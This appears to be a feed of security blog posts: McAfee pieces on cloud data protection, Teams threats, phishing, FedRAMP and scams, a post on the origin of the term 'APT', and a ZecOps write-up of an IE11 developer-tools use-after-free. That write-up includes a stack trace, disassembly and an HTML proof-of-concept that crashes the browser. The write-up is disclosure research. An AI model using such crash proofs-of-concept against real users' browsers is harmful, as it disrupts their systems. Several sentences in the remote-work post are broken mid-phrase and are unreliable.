One last concern remains: if a file is “lost”, if access must be restricted to files that are no longer in direct control (such as when a user leaves the company), or if the organization simply wants to update policies on protected files, the policy on those files can be dynamically updated. This addresses a major data loss concern that companies have for cloud service providers and general data use for remote users. Ensuring files are always protected, regardless of scenario, is simple to achieve with Seclore by taking the action to update a policy. Once the policy has been updated, even files on a thumb drive stuffed in a drawer are now re-protected from accidental or intentional disclosure.

Conclusion

This article addresses several notable concerns for customers doing business in a cloud model. Important/sensitive data can now be effortlessly protected as it migrates to and through cloud services to its ultimate destination. The organization can prove compliance to auditors that the data was protected and continues to be protected. Security operations can track incidents and follow the access history of files. Finally, the joint solution is easy to use and enables businesses to confidently conduct business in the cloud.

Next Steps

McAfee and Seclore partner both at the endpoint and in the cloud as an integrated solution. To find out more and see this solution running in your environment, send an inquiry to cloud@mcafee.com

 

The post “Best of Breed” – CASB/DLP and Rights Management Come Together appeared first on McAfee Blogs.

Top 10 Microsoft Teams Security Threats

2020 has seen cloud adoption accelerate, with Microsoft Teams as one of the fastest growing collaboration apps. McAfee customers’ use of Teams increased by 300% between January and April 2020. When we looked into Teams use in more detail in June, we found these statistics, on average, in our customer base:

 

Teams Created                         367
Members added to Teams              6,526
Number of Teams Meetings          106,000
3rd Party Apps added to Teams         185
Guest users added to Teams          2,906

This means that a typical enterprise has a new guest user added to their teams every few minutes – you wouldn’t allow unknown people to walk into an office, straight past security and walk around the building unescorted looking at papers sitting on people’s desks, but at the same time you want to allow in those guests you trust. For Teams, you need the same controls – allow in those guests you trust, but confirm their identity and make sure that they don’t see confidential information.

Microsoft invests huge amounts of time and money in the security of their systems, but security of the data in those systems and how they are used by the users is the responsibility of the enterprise.

The breadth of options, including inviting guest users and integration with 3rd party applications can be the Achilles heel of any collaboration technology. It takes just seconds to add an external third party into an internal discussion without realizing the potential for data loss, so sadly the risk of misconfiguration, oversharing or misuse can be large.

IT security teams need the ability to manage and control use to reduce risk of data loss or malware entering through Teams.

After working with hundreds of enterprises and over 40 million MVISION Cloud users worldwide and discussing with IT security, governance and risk teams how they address their Microsoft Teams security concerns, we have published a paper that outlines the top ten security threats and how to address them.

Microsoft Teams: Top 10 Security Threats

This collaboration potentially increases threats such as data loss and malware distribution. In this paper, McAfee discusses the top threats resulting from Teams use along with recommended actions.

A few of the Top 10 Microsoft Teams Security Threats are below; read the paper for the full list.

  1. Microsoft Teams Guest Users: Guests can be added to see internal/sensitive content. By setting allow and/or block list domains, security can be implemented with the flexibility to allow employees to collaborate with authorized guests via Teams.
  2. Screen sharing that includes sensitive data. Screen sharing is very powerful, but can inadvertently share confidential data, especially if communication applications such as email are showing alerts on the screen.
  3. Access from Unmanaged Devices: Teams can be used on unmanaged devices, potentially resulting in data loss. The ability to set policies for unmanaged devices can safeguard Teams content.
  4. Malware Uploaded via Teams: File uploads from guests or from unmanaged devices may contain malware. IT administrators need the ability to either block all file uploads from unmanaged devices or to scan content when it is uploaded and remove it from the channel, informing IT management of any incidents.
  5. Data Loss Via Teams Chat and File Shares: File shares in Teams can lose confidential data. Data loss prevention technologies with strong sensitive content identification and sharing control capabilities should be implemented on Teams chat and file shares.
  6. Data Loss Via Other Apps: Teams App integration can mean data may go to untrusted destinations. As some of these apps may transfer data via their services, IT administrators need a system to discover third-party apps in use, review their risk profile and provide a workflow to remediate, audit, allow, block or notify users on an app’s status and revoke access as needed.

McAfee has a wealth of experience helping customers secure their cloud computing systems, built around the MVISION Cloud CASB and other technologies. We can advise you about Microsoft Teams security and discuss possible threats of taking no action. Contact us to let us help you.

Teams is just one of the many applications within the Microsoft 365 suite and it is important to deploy common security controls for all cloud apps. MVISION Cloud provides security for Microsoft 365 and other cloud-based applications such as Salesforce, Box, Workday, AWS, Azure, Google Cloud Platform and customers’ own internally developed applications.

 

The post Top 10 Microsoft Teams Security Threats appeared first on McAfee Blogs.

Ready, Set, Shop: Enjoy Amazon Prime Day Without the Phishing Scams


For many, Amazon Prime Day is an opportunity to score some great deals. For hackers, Amazon’s annual discount shopping campaign is an opportunity to target unsuspecting shoppers with phishing scams. In fact, researchers at McAfee Labs previously uncovered a phishing kit specifically created to steal personal information from Amazon customers in America and Japan just in time for last year’s Amazon Prime Day. 

Let’s dive into the details of how this phishing kit worked and what you can do to protect yourself while hunting for those Prime Day bargains.  

Phishing Kit Allowed Hackers to Target Amazon Users 

You’ve probably received an email that looked a bit phishy: perhaps the logo was just slightly off-centered, or something about it didn’t feel quite right. That is how the phishing kit worked: hackers created fake emails that looked like they originated from Amazon (but didn’t). Once opened, the email prompted the unsuspecting recipient to provide their login credentials on a malicious website. Once logged in, hackers had access to the victim’s entire account, enabling them to make purchases or even worse, steal the victim’s credit card information.

When this threat first emerged, the McAfee Labs researchers reported widespread use of the phishing kit – with over 200 malicious URLs deployed on innocent online shoppers. The phishing kit was then sold through an active Facebook group with over 300 members looking for a way to access unsuspecting shoppers’ Prime accounts. McAfee notified Facebook of this group’s activity when it surfaced, and the social network took an active role in removing groups and accounts that violate their policies.

Protect Your Prime Day Shopping with These Tips 

Users hoping to score some online shopping deals this week should familiarize themselves with common phishing tactics to help protect their personal and financial information. If you’re planning on participating in Prime Day, follow these security steps to help you swerve malicious cyberattacks and shop with peace of mind: 

Beware of bogus deals 

If you see an ad for Prime Day that looks too good to be true, chances are that the ad isn’t legitimate. Play it safe and don’t click on the ad. 

Think before you click 

Be skeptical of ads shared on social media sites, emails, and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message regarding Prime Day, it’s best to avoid interacting with the message altogether. 

Do your due diligence with discount codes 

If a discount code lands in your inbox, you’re best off verifying it through Amazon.com directly rather than clicking on any links. 

If you do suspect that your Amazon Prime account has been compromised due to a cyberthreat, take the following steps: 

Change your password 

Change the passwords to any accounts you suspect may have been impacted. Make sure your new credentials are strong and unique from your other logins. For tips on how to create a more secure password, read our blog on common password habits and how to safeguard your accounts.  

Keep an eye on your bank account 

One of the most effective ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately. 

Consider using identity theft protection 

A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

Stay Updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ready, Set, Shop: Enjoy Amazon Prime Day Without the Phishing Scams appeared first on McAfee Blogs.

FedRAMP – What’s the Big Deal?

If you are someone who works for a cloud service provider in the business of federal contracting, you probably already have a good understanding of FedRAMP. It is also likely that our regular blog readers know the ins and outs of this program.

For those who are not involved in these areas, however, this acronym may be more unfamiliar. Perhaps you have only heard of it in passing conversation with a few of your expert cybersecurity colleagues, or you are just curious to learn what all of the hype is about. If you fall into this category – read on! This blog is for you.

At first glance, FedRAMP may seem like a type of onramp to an interstate headed for the federal government – and in a way, it is.

FedRAMP stands for the Federal Risk and Authorization Management Program, which provides a standard security assessment, authorization and continuous monitoring for cloud products and services to be used by federal agencies. The program’s overall mission is to protect the data of U.S. citizens in the cloud and promote the adoption of secure cloud services across the government with a standardized approach.

Once a cloud service has successfully made it onto the interstate – or achieved FedRAMP authorization – it’s allowed to be used by an agency and listed in the FedRAMP Marketplace. The FedRAMP Marketplace is a one-stop-shop for agencies to find cloud services that have been tested and approved as safe to use, making it much easier to determine if an offering meets security requirements.

In the fourth year of the program, FedRAMP had 20 authorized cloud service offerings. Now, eight years into the program, FedRAMP has over 200 authorized offerings, reflecting its commitment to help the government shift to the cloud and leverage new technologies.

Who should be FedRAMP authorized?

Any cloud service provider that has a contract with a federal agency or wants to work with an agency in the future must have FedRAMP authorization. Compliance with FedRAMP can also benefit providers who don’t have plans to partner with government, as it signals to the private sector they are committed to cloud security.

Using a cloud service that complies with FedRAMP standards is mandatory for federal agencies. It has also become popular with organizations in the private industry, which are more often looking to FedRAMP standards as a security benchmark for the cloud services they use.

How can a cloud service obtain authorization?

There are two ways for a cloud service to obtain FedRAMP authorization. One is with a Joint Authorization Board (JAB) provisional authorization (P-ATO) and the other is through an individual agency Authority to Operate (ATO).

A P-ATO is an initial approval of the cloud service provider by the JAB, which is made up of the Chief Information Officers (CIOs) from the Department of Defense (DoD), Department of Homeland Security (DHS) and General Services Administration (GSA). This designation means that the JAB has provided a provisional approval for agencies to leverage when granting an ATO to a cloud system.

The head of an agency grants an ATO as part of the agency authorization process. An ATO may be granted after an agency sponsor reviews the cloud service offering and completes a security assessment.

Why seek FedRAMP approval?

Achieving FedRAMP authorization for a cloud service is a very long and rigorous process, but it has received high praise from security officials and industry experts alike for its standardized approach to evaluate whether a cloud service offering meets some of the strongest cybersecurity requirements.

There are several benefits for cloud providers who authorize their service with FedRAMP. The program allows an authorized cloud service to be reused continuously across the federal government – saving time, money and effort for both cloud service providers and agencies. Authorization of a cloud service also gives service providers increased visibility of their product across government with a listing in the FedRAMP Marketplace.

By electing to comply with FedRAMP, cloud providers can demonstrate dedication to the highest data security standards. Though the process for achieving FedRAMP approval is complex, it is worthwhile for providers, as it signals a commitment to security to government and non-government customers.

McAfee’s Commitment to FedRAMP

At McAfee, we are dedicated to ensuring our cloud services are compliant with FedRAMP standards. We are proud that McAfee’s MVISION Cloud is the first Cloud Access Security Broker (CASB) platform to be granted a FedRAMP High Impact Provisional Authority to Operate (P-ATO) from the U.S. Government’s Joint Authorization Board (JAB).

Currently, MVISION Cloud is in use by ten federal agencies, including the Department of Energy (DOE), Department of Health and Human Services (HHS), Department of Homeland Security (DHS), Food and Drug Administration (FDA) and National Aeronautics and Space Administration (NASA).

MVISION Cloud allows federal organizations to have total visibility and control of their infrastructure to protect their data and applications in the cloud. The FedRAMP High JAB P-ATO designation is the highest compliance level available under FedRAMP, meaning that MVISION Cloud is authorized to manage highly sensitive government data.

We look forward to continuing to work closely with the FedRAMP program and other cloud providers dedicated to authorizing cloud service offerings with FedRAMP.

 

The post FedRAMP – What’s the Big Deal? appeared first on McAfee Blogs.

Providing NIST Guest Researchers with the Tools they Need

NIST is made up of a wide array of professionals from many different backgrounds, from science and engineering to communications, information technology, and many more. Combining all of these fields onto one campus and cross-department cooperation builds this institute into a leader of standards and technology. Outside of the federal government employees here, there is another group of individuals that bring just as much to the table as anyone else, and they are the guest researchers. Guest researchers at NIST can be broken down into two groups: domestic associates and foreign associates. A

Crash Reproduction Series: IE Developer Console UAF


During a DFIR investigation using ZecOps Crash Forensics on a developer’s computer, we encountered a consistent crash in Internet Explorer 11. The TL;DR is that although this bug is not exploitable, it presents an interesting expansion of the attack surface through the developer consoles in browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

The relevant instructions leading to the crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to the MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.
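The missing unsubscribe described under Reproduction and the MemGC behaviour described above, modelled in C as an added example (not ZecOps' or Microsoft's code). The struct names, the single-slot registry and the quarantine array are hypothetical stand-ins, and the third load is reported as a result value instead of faulting.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative model only: these types are hypothetical, not mshtml's. */
struct view     { int removals_seen; };          /* what the callback finally updates */
struct consumer { struct view *view; };          /* Events-tab consumer, owns a view  */
struct callback { struct consumer *consumer; };  /* registration entry: the "this"    */

enum notify_result { NOTIFY_NO_SUBSCRIBER, NOTIFY_DELIVERED, NOTIFY_NULL_DEREF };

/* MemGC-style free as the article describes it: zero the block and keep it
 * allocated while something may still point to it; release happens later. */
#define QUARANTINE_MAX 8
static void *quarantine[QUARANTINE_MAX];
static size_t quarantine_len;

static void memgc_free(void *block, size_t size)
{
    memset(block, 0, size);                  /* stale readers now see zeros / NULL */
    if (quarantine_len < QUARANTINE_MAX)     /* demo-sized; a full list just leaks */
        quarantine[quarantine_len++] = block;
}

static void memgc_release_all(void)
{
    while (quarantine_len > 0)
        free(quarantine[--quarantine_len]);
}

static struct callback registry;   /* one subscription slot keeps the model small */

static struct consumer *devtools_open_events_tab(void)
{
    struct consumer *c = malloc(sizeof *c);
    struct view *v = calloc(1, sizeof *v);
    if (!c || !v) { free(c); free(v); return NULL; }
    c->view = v;
    registry.consumer = c;         /* subscribe to listener add/remove events */
    return c;
}

static void devtools_close(struct consumer *c, int unsubscribe_first)
{
    if (unsubscribe_first && registry.consumer == c)
        registry.consumer = NULL;  /* the step the buggy path skips */
    free(c->view);                 /* only the consumer block is modelled as MemGC-managed */
    memgc_free(c, sizeof *c);
}

/* Models the three loads in the crash: this -> consumer -> view -> field. */
static enum notify_result on_listener_removed(void)
{
    struct consumer *c = registry.consumer;  /* 1st load: address of a zeroed block */
    if (!c)
        return NOTIFY_NO_SUBSCRIBER;
    struct view *v = c->view;                /* 2nd load: zeroed block yields NULL  */
    if (!v)
        return NOTIFY_NULL_DEREF;            /* 3rd load would fault at NULL+offset */
    v->removals_seen++;
    return NOTIFY_DELIVERED;
}

/* Opens the tab, fires one event, closes dev tools, fires another event.
 * Returns the result of the event fired after the close. */
static enum notify_result run_scenario(int unsubscribe_first,
                                       enum notify_result *while_open)
{
    struct consumer *c = devtools_open_events_tab();
    if (!c)
        abort();
    *while_open = on_listener_removed();
    devtools_close(c, unsubscribe_first);
    enum notify_result after = on_listener_removed();
    registry.consumer = NULL;      /* drop the stale reference ...          */
    memgc_release_all();           /* ... so the quarantined block can go   */
    return after;
}

int main(void)
{
    enum notify_result open_r;
    printf("close without unsubscribe: %d\n", run_scenario(0, &open_r));
    printf("close with unsubscribe:    %d\n", run_scenario(1, &open_r));
    return 0;
}
```

Without the zero-and-quarantine step, the second load would read whatever the allocator had since placed in the freed block, which is the condition the mitigation removes.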

Responsible Disclosure

We reported this issue to Microsoft, which decided not to fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at careers@zecops.com


Stay Connected and Protected During Work, School, and Play


These days, work and home mean practically the same thing. Our house is now an office space or a classroom, so that means a lot of our day-to-day happens online. We check emails, attend virtual meetings, help our children distance learn, use social media platforms to check in on our friends and family – our entire lives are digital! This increase in connectivity could mean more exposure to threats – but it doesn’t have to. That’s why this National Cybersecurity Awareness Month (NCSAM) you should learn what it means to be cyber smart.

In our third blog for this NCSAM this year, we examine what that entails. Let’s dive in.

Stay Secure While Working Remote

According to Stanford research, almost twice as many employees work from home as at the office in the U.S. in response to the COVID-19 pandemic. And this new work-from-home economy is probably only going to expand in the future. Your pets and children will continue to make surprise guest appearances on work calls, or you may continue your new job hunt from the kitchen table. But as you work on juggling your work life and personal life at home base, this doesn’t mean that you should have to juggle security threats too.

The new WFH landscape has also brought about increased risk from . Unlike corporate offices – which usually have IT staff responsible for making any necessary network security updates and patches – users’ home network security is in their own hands. This means users must ensure that their Wi-Fi connections are private and locked with a complex password or employ the help of a VPN to prevent hackers from infiltrating your work.

Be Cybersmart While Distance Learning

Work isn’t the only element of consumers’ lives that’s recently changed – school is also being conducted out of many students’ homes as they adapt to distance learning. As a result, parents are now both professionals and teachers, coaching students through new online learning obstacles. But as more students continue their curriculum from home and online activity increases, so does the possibility of exposure to inappropriate content or other threats.

For instance, the transition to distance learning has led to an increase in online students to lose valuable time meant to be spent on their education.

To help ensure that learning from home goes as smoothly as possible, parents must stay updated on the threats that could be lurking around the corner of their children’s online classrooms. Take the time to secure all the devices that power your kids’ learning with a comprehensive security solution.

Enhance Your Streaming Security

Of course, everyone needs to find a balance between work, school, and play! These days, that means scavenging the internet for new content to help keep entertained at home. In fact, according to Nielsen, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. However, causing users to turn to other less secure alternatives such as illegal downloads and links to “free” content riddled with malware. This could open consumers up to a whole host of threats.

Users looking to stream the latest TV show or movie should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

If You Connect It, Protect It

We all need to be cybersmart and aware of the threats that come with our lifestyle changes. By following these pointers, you can block threats from impacting your new day-to-day and ensure security is one less thing to worry about. When looking ahead to the future, incorporate the aforementioned pointers into your digital life so that you are prepared to take on whatever the evolving security landscape brings – now that’s being cybersmart!

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, look out for our other National Cybersecurity Awareness Month blogs, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Stay Connected and Protected During Work, School, and Play appeared first on McAfee Blogs.

How To Spot Tech Support Scams

When something goes wrong with your computer or devices, it can cause a panic. After all, most of us depend on technology not only to work and connect with others, but also to stay on top of our daily lives. That’s why tech support scams are often successful. They appear to offer help when we need it the most. But falling for these scams can put your devices, data, and money at even greater risk.

Although support scams have been around almost as long as the internet, these threats have increased dramatically over the last couple of years, proving to be a reliable way for scammers to make a quick buck.

In fact, the Internet Crime Complaint Center (IC3) said that it received nearly 11,000 tech support related complaints in 2017, leading to losses of $15 million, 90% higher than the losses reported in 2016. Microsoft alone saw a 24% increase in tech scams reported by customers in 2017 over the previous year, with 15% of victims saying they lost money.

Often, scammers convince users that there is a problem with their computer or device by delivering pop-up error messages. These messages encourage the user to “click” to troubleshoot the problem, which can download a piece of malware onto their machine, or prompt them to buy fake security software to fix the issue. In some cases, users wind up downloading ransomware, or paying $200 to $400 for fake software to fix problems they didn’t actually have.

And, in a growing number of instances, scammers pose as legitimate technology companies, offering phony support for real tech issues. Some even promote software installation and activation for a fee, when the service is actually provided for free from the software provider. They do this by posting webpages or paid search results using the names of well-known tech companies. When a user searches for tech help, these phony services can appear at the top of the search results, tricking people into thinking they are the real deal.

Some cybercriminals have even gone so far as to advertise fake services on legitimate online forums, pretending to be real tech companies such as Apple, McAfee, and Amazon. Since forum pages are treated as quality content by search engines, these phony listings rank high in search results, confusing users who are looking for help.

The deception isn’t just online. More and more computer users report phone calls from cybercrooks pretending to be technology providers, warning them about problems with their accounts, and offering to help resolve the issue for a fee. Or worse, the scammer requests access to the victim’s computer to “fix the problem”, with the hopes of grabbing valuable data, such as passwords and identity information. All of these scams leave users vulnerable.

Here’s how to avoid support scams to keep your devices and data safe:

  • If you need help, go straight to the source—Type the address of the company you want to reach directly into the address bar of your browser—not the search bar, which can pull up phony results. If you have recently purchased software and need help, check the packaging the software came in for the correct web address or customer support line. If you are a McAfee customer, you can always reach us at https://service.mcafee.com.
  • Be suspicious—Before you pay for tech support, do your homework. Research the company by looking for other customers’ reviews. Also, check to see if your technology provider already offers the support you need for free.
  • Be wary of callers asking for personal information, especially if they reach out to you first—Situations like this happen all the time, even to institutions like the IRS. McAfee’s own policy is to answer support questions via our website only, and if users need assistance, they should reach out here directly. Never respond to unsolicited phone calls or pop-up messages, warning you about a technical issue, and never let anyone take over your computer or device remotely.
  • Surf Safe—Sometimes it can be hard to determine if search results are safe to click on, or not. Consider using a browser extension that can warn you about suspicious sites right in your search results, and help protect you even if you click on a dangerous link.
  • Keep informed—Stay up-to-date on the latest tech support scams so you know what to watch out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Spot Tech Support Scams appeared first on McAfee Blogs.

Greg Rattray Invented the Term Advanced Persistent Threat

 



I was so pleased to read this Tweet yesterday from Greg Rattray:

"Back in 2007, I coined the term “Advanced Persistent Threat” to characterize emerging adversaries that we needed to work with the defense industrial base to deal with... Since then both the APT term and the nature of our adversaries have evolved. What hasn’t changed is that in cyberspace, advanced attackers will persistently go after targets with assets they want, no matter the strength of defenses."

Background


First, some background. Who is Greg Rattray?

First, you could call him Colonel or Doctor. I will use Col as that was the last title I used with him, although these days when we chat I call him Greg. 

Col Rattray served 21 years in the Air Force and also earned his PhD in international security from Tufts University. His thesis formed the content for his 2001 book Strategic Warfare in Cyberspace, which I reviewed in 2002 and rated 4 stars. (Ouch -- I was a bit stingy with the stars back then. I was more of an operator and less of a theorist or historian in those days. Such was my bias I suppose.)

Col Rattray is also a 1984 graduate of the Air Force Academy. He studied history and political science there and returned as an assistant professor in the early 1990s. He was one of my instructors when I was a cadet there. (I graduated in 1994 with degrees in history and political science.) Col Rattray then earned a master of public policy degree at Harvard Kennedy School. (I did the same, in 1996.) 

Do you see a pattern here? He is clearly a role model. Of course, I did not stay in the Air Force as long, earn the same rank, or survive my PhD program!

After the Academy, Col Rattray served as commander of the 23rd Information Operations Squadrons on Security Hill in San Antonio, Texas. I was working in the AFCERT at the time. 

One of the last duties I had in uniform was to travel to Nellis AFB outside Las Vegas and participate in a doctrine writing project for information warfare. At the time I was not a fan of the idea, but Col Rattray convinced me someone needed to write down how we did computer network defense in the AFCERT. 

He didn't order me to participate, which I always appreciated. Years later I told him it was a good idea to organize that project and that I was probably just grumpy because of the way the Air Force personnel system had treated me at the end of my military career.

Why The Tweet Matters


For years I've had to dance around the issue of who invented the term "APT." In most narratives I say that an Air Force colonel invented the term in 2006. I based this on discussions I had with colleagues in the defense industrial base who were working with said colonel and his team from the Air Force. I did not know back then that it was Col Rattray and his team from the Air Force Information Warfare Center. 

Years later I learned of Rattray's role, but not directly from him. Only this year did Col Rattray confirm to me that he had invented the term, and that 2007 was the correct year. I encouraged him to say something, because as an historian I appreciate the value of facts and narrative. As I Tweeted after seeing Greg's Tweet:

"Security, like any other field, has HISTORY, which means there are beginnings, and stories, and discoveries, and innovators, and leaders, and first steps, and pioneers. I'm so pleased to see people like @GregRattray_ feel comfortable enough after all these years to say something."

I don't think many people in the security field think about history. Security tends to be obsessed with the "new" and the "shiny." Not enough people wonder how we got to this point, or what decisions led to the current situation. The security scene in 2020 is very different from the scene in 1960, or 1970, or 1980, or 1990, or 2000, or even 2010. This is not the time to describe how or why that is the case. I'm just glad a very important piece of the puzzle is now public.

More on the APT



If you'd like to learn more about this history of the APT, check out my newest book -- The Best of TaoSecurity Blog, Volume 2. I devote an entire chapter to blog posts and new commentary on the APT. Volume 1 arrived a few months before this new book, and I'm working on Volume 3 now.

#BeCyberSmart: Equipping Kids to Stay Safe on New Video Apps


These days, spending time with friends face-to-face still isn’t always an option for teens. So, finding a fun, new app can be a little like discovering your own private beach where you can chill out, connect with friends, and be thoroughly entertained. Keeping them safe on that digital beach? That’s where parents can make a difference.

With all the popular, increasingly sophisticated video apps available, it’s easy to understand why safety ends up being the last thing on our kids’ minds. I get it. My daughter and I recently sat for hours watching Tik Tok videos and laughing until we cried.

However, October is National Cybersecurity Month and the perfect time to hit pause and talk about how to stay safe on all the apps vying for our attention.

Popular Apps to Monitor

Triller. The Triller app is a video-based platform, much like Tik Tok, that has been around since 2015. Triller has a variety of filters, and music kids can use with the videos they create.

What to monitor: Triller’s content may not always be appropriate, and because viewers can leave comments on videos, there’s a risk of cyberbullying. Also, Triller has some privacy loopholes such as data collection, location tracking, and a public account default — all of which can be modified in Settings.

HouseParty is a group video chat platform nicknamed the “Quarantine App” since its popularity increased by an additional 10 million users during the COVID lockdown. Houseparty allows users to invite friends and “friends of friends” into group video-chat sessions — much like a party. The app displays up to eight live streams on the screen at a time, creating an instant sense of community.

What to monitor. Because the app allows “friends of friends” to livestream in a group, that unknown element opens the door to a number of safety issues. Encourage kids to deny join requests from unknown people. While some users leave rooms unlocked while live streaming their party, encourage your child to use the padlock function to limit conversations to people who know each other.

Yubo. The Yubo app (formerly Yellow) is also called the “Tinder for Teens.” Kids can connect and live stream with people they know — and easily connect with people they don’t. If two users swipe right, Yubo will match them, and they can share Snapchat or Instagram names. Another app very similar to Yubo is the Hoop app.

What to monitor. Content on Yubo can be explicit and cyberbullying can arise more often since fake accounts are common. Yubo’s swipe format promotes an appearance-driven match standard that may not be healthy for some teens.

Byte. Another app similar to Tik Tok, Byte, features short-form videos. Byte, created by the Founders of the now defunct Vine app, lacks the filters and music of other video apps, but that’s okay; the simplicity is a plus for Byte fans.

What to monitor: Be aware of inappropriate content, cyberbullying in comments, and unknown “friends” who may be part of your child’s Byte community. Online predators have been known to reach out to kids on this app. While unwanted followers can be blocked, surprisingly, Byte doesn’t give you the ability to make your account private.

App Safety Basics

Practice personal responsibility. The theme for Cybersecurity Month 2020 is Do Your Part #BeCyberSmart. With this in mind, discuss the responsibility that comes with owning technology, be it a smartphone, a game system, a smartwatch, or any other connected device. The goal, says The National Cyber Security Alliance,

“If you connect it, protect it.”

Privacy settings. To protect privacy and keep unknown people from connecting with minors, maximize privacy Settings on each new app.

Increase safeguards. Apps can be addictive and siphon family time, study time, and sleep. A comprehensive security solution can help parents limit device time, monitor activity, and block risky content and apps.

Share wisely. Even a 15-second video shared with “close friends only” can end up in the public stream. Advise your child to only share videos or photos they’d feel good sharing with the world.

Protect personal information. Remind your child not to share private details about themselves or their family members with anyone online. This includes emails, full names, phone numbers, pet names, school names, or location.

Block and report. Talk with your child about what you consider appropriate versus inappropriate content, how to block strangers, and how to report cyberbullying and scams.

Finally, keep talking with your kids — about everything. Ultimately, it will be your consistency in having honest, ongoing dialogue with your child that will be your most valuable tool in keeping them safe online.

 

The post #BeCyberSmart: Equipping Kids to Stay Safe on New Video Apps appeared first on McAfee Blogs.

ST24: Proactive Protection to Minimize Endpoint Risks (German)

Against the backdrop of the IT skills shortage, it is becoming increasingly difficult for companies to keep pace with the growing number and sophistication of cyber attacks, which often forces security teams into a purely reactive posture. In this podcast we discuss how you can use a comprehensive threat database and proactive response measures to improve your endpoint security and cut response times from months to hours. Joining us for the discussion are Heiko Brückle, McAfee Senior Security Engineer, and Chris Trynoga, McAfee Regional Solution Architect.

 

 

The post ST24: Proactive Protection to Minimize Endpoint Risks (German) appeared first on McAfee Blogs.

Fuzzing internships for Open Source Software

Open source software is the foundation of many modern software products. Over the years, developers increasingly have relied on reusable open source components for their applications. It is paramount that these open source components are secure and reliable, as weaknesses impact those that build upon them.

Google cares deeply about the security of the open source ecosystem and recently launched the Open Source Security Foundation with other industry partners. Fuzzing is an automated testing technique to find bugs by feeding unexpected inputs to a target program. At Google, we leverage fuzzing at scale to find tens of thousands of security vulnerabilities and stability bugs. This summer, as part of Google’s OSS internship initiative, we hosted 50 interns to improve the state of fuzz testing in the open source ecosystem.

